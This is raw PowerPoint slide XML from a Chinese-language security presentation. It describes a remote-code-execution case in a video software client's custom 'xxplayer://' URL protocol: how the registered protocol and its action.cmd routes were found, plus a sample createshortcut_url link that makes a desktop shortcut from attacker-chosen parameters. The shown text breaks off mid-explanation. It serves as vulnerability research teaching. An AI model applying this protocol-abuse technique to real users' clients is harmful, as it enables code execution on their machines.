        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="28pt | 内容简介，关键词等等 Our businesses comprised core commerce, cloud computing, digital media and entertainment. We enable businesses to transform the way they market, sell, operate and improve their efficiencies.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52029B4-D97F-8E00-BB1A-16267C14D905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306712" y="3786189"/>
            <a:ext cx="5990200"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lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="EC6C01"/>
                </a:solidFill>
                <a:latin typeface="Alibaba PuHuiTi R"/>
                <a:ea typeface="Alibaba PuHuiTi R"/>
                <a:cs typeface="Alibaba PuHuiTi R"/>
                <a:sym typeface="Alibaba PuHuiTi"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="just" defTabSz="914400" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>   附录总结：实战案例中出现的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直线连接符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6ECE2F7-23D5-5FB3-11C8-517B33CD1F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="2151810"/>
            <a:ext cx="0" cy="2921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16B232E4-3533-06C8-77A1-848A7E3AC451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="3898900"/>
            <a:ext cx="0" cy="2921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B025496E-66D0-4323-E388-E13C340DAB17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701800" y="3022600"/>
            <a:ext cx="0" cy="2921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232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
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B806ACC9-91BD-BDA2-9BB0-44A272027F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872441" y="3198168"/>
            <a:ext cx="6447118" cy="461665"/>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传统客户端问题：某视频软件客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2756053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某视频软件客户端</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECB1CDB-9DD4-62F5-710A-09AB84DA947E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="286294" y="1754925"/>
            <a:ext cx="11619410" cy="4476683"/>
            <a:chOff x="442602" y="1919195"/>
            <a:chExt cx="11619410" cy="4476683"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975817F8-1916-26D4-AFFB-76F8D29A57ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="536864" y="1919195"/>
              <a:ext cx="5803900" cy="1536700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B168F99F-5588-81AE-087B-4494B172BC76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442602" y="3486400"/>
              <a:ext cx="5898162" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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通过</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>URLProtocolView</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>找到视频软件客户端注册的伪协议：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>://</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02ED4A1B-DB92-BECE-C174-289135ABB589}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442602" y="5811103"/>
              <a:ext cx="5898162" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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通过字符串定位程序伪协议的处理功能点，也可以知道有哪些的伪协议路由。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="图片 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98653618-CF04-4559-40D5-C6079799F61A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="536864" y="4272179"/>
              <a:ext cx="5803900" cy="1505161"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="图片 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA32CB41-B0E5-A2A2-1CE0-528EBC0F1C18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6565900" y="1919195"/>
              <a:ext cx="5236996" cy="1567205"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C29EBAF-2B6E-06AE-BA61-28A9751DCD87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6565900" y="3778787"/>
              <a:ext cx="5496112" cy="1815882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>以</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</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为前缀，后半部分对应不同功能：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>/play</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</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downloadShareVideo</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</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createshortcut_url</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</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createshortcut</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</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activeHomepage</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en"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278444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某视频软件客户端</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692CB630-D720-FDDF-C748-42404F1ADFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="452925" y="1673260"/>
            <a:ext cx="11286147" cy="4485048"/>
            <a:chOff x="333768" y="1444313"/>
            <a:chExt cx="11286147" cy="4485048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="文本框 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A4542D-AE56-51DF-9AB9-046A87668C34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="333769" y="1444313"/>
              <a:ext cx="6461110" cy="2062103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>访问</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xplayer</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action.cmd</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createshortcut_url</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>就会在桌面上创建一个快捷方式，跟进对应处理逻辑，它会取两个参数</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</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a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>n</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>ame</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的值，带入到</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CreateUrlShortcut</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>函数执行。</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>访问如下链接：</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxplayer</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action.cmd</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-C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createshortcut_url?url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=http://</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>www.baidu.com&amp;name</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=Test</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="16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80B9837E-37CD-B73C-A283-EDA59189532E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7053199" y="1542788"/>
              <a:ext cx="4566716" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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创建了一个名为</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>T</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>est</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的快捷方式，目标为：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>C:\</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>XXX\</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
